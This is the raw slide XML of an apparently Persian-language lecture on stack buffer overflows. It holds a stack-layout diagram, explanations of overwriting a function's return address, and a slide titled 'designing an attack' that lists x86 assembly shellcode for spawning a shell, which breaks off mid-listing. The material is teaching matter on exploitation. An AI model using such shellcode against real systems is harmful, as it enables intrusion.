            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19478" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3696" y="2448"/>
              <a:ext cx="318" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19479" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3312" y="2448"/>
              <a:ext cx="351" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>sfp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19480" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2496" y="2064"/>
              <a:ext cx="768" cy="384"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19481" name="Rectangle 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="2064"/>
              <a:ext cx="1536" cy="384"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19482" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2544" y="2448"/>
              <a:ext cx="681" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>buffer1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19483" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1440" y="2448"/>
              <a:ext cx="681" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>buffer2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19484" name="Text Box 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2784" y="1872"/>
              <a:ext cx="180" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600"/>
                <a:t>8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19485" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1632" y="1872"/>
              <a:ext cx="244" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600"/>
                <a:t>12</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19486" name="Text Box 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="4830" y="1996"/>
              <a:ext cx="1341" cy="518"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Top of memory</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Bottom of stack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19487" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-5400000">
              <a:off x="-534" y="2118"/>
              <a:ext cx="1586" cy="518"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Bottom of memory</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Top of stack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19488" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="672" y="1872"/>
              <a:ext cx="180" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600"/>
                <a:t>4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19489" name="Rectangle 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="576" y="2064"/>
              <a:ext cx="384" cy="384"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19490" name="Text Box 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="672" y="2448"/>
              <a:ext cx="180" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>r</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19462" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="3352800"/>
            <a:ext cx="445956" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19463" name="Text Box 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="1676400"/>
            <a:ext cx="1328738" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>buffer1 + 12</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19464" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="5029200"/>
            <a:ext cx="7924800" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اين </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه باعث </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ميشود </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>که </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>انتساب </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> در نظر گرفته نشود، و مقدار </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> براي </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> چاپ بشود.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Freeform 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="2731252" y="545348"/>
            <a:ext cx="1529503" cy="4553607"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 437321"/>
              <a:gd name="connsiteY0" fmla="*/ 2080591 h 2080591"/>
              <a:gd name="connsiteX1" fmla="*/ 424069 w 437321"/>
              <a:gd name="connsiteY1" fmla="*/ 940904 h 2080591"/>
              <a:gd name="connsiteX2" fmla="*/ 79513 w 437321"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2080591"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="437321" h="2080591">
                <a:moveTo>
                  <a:pt x="0" y="2080591"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="205408" y="1684130"/>
                  <a:pt x="410817" y="1287669"/>
                  <a:pt x="424069" y="940904"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="437321" y="594139"/>
                  <a:pt x="258417" y="297069"/>
                  <a:pt x="79513" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="31750" cap="rnd" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="oval" w="med" len="med"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>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1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35"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11</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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90" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="796925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>طراحي حمله!!!</a:t>
            </a:r>
            <a:endParaRPr smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1524000"/>
            <a:ext cx="8229600" cy="1323439"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" kern="1200" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>در اين جا ديديم که چگونه ميتوان بر روي آدرس بازگشت يک تابع چيزي بنويسيم و تابع را به جايي که خودمان ميخواهيم هدايت کنيم!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" kern="1200" smtClean="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" kern="1200" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>اما اين موضوع چگونه ميتواند به يک دشمن کمک کند تا به برنامه ما نفوذ کند؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="1200" smtClean="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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152400"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t> ايجاد کد مورد نظر</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>براي باز کردن </a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="1447800"/>
            <a:ext cx="3345788" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اولين </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>قدم </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ايجاد يک </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کد مخرب است!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="2535238" cy="4248150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>jmp	0x1F</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>popl	%esi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>movl	%esi, 0x8(%esi)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>xorl	%eax, %eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>movb	%eax, 0x7(%esi)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>movl	%eax, 0xC(%esi)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>movb	$0xB, %al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>movl	%esi, %ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>leal	0x8(%esi), %ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>leal 	0xC(%esi), %edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>int 	$0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>xorl	%ebx, %ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>movl	%ebx, %eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>inc	%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>int	$0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
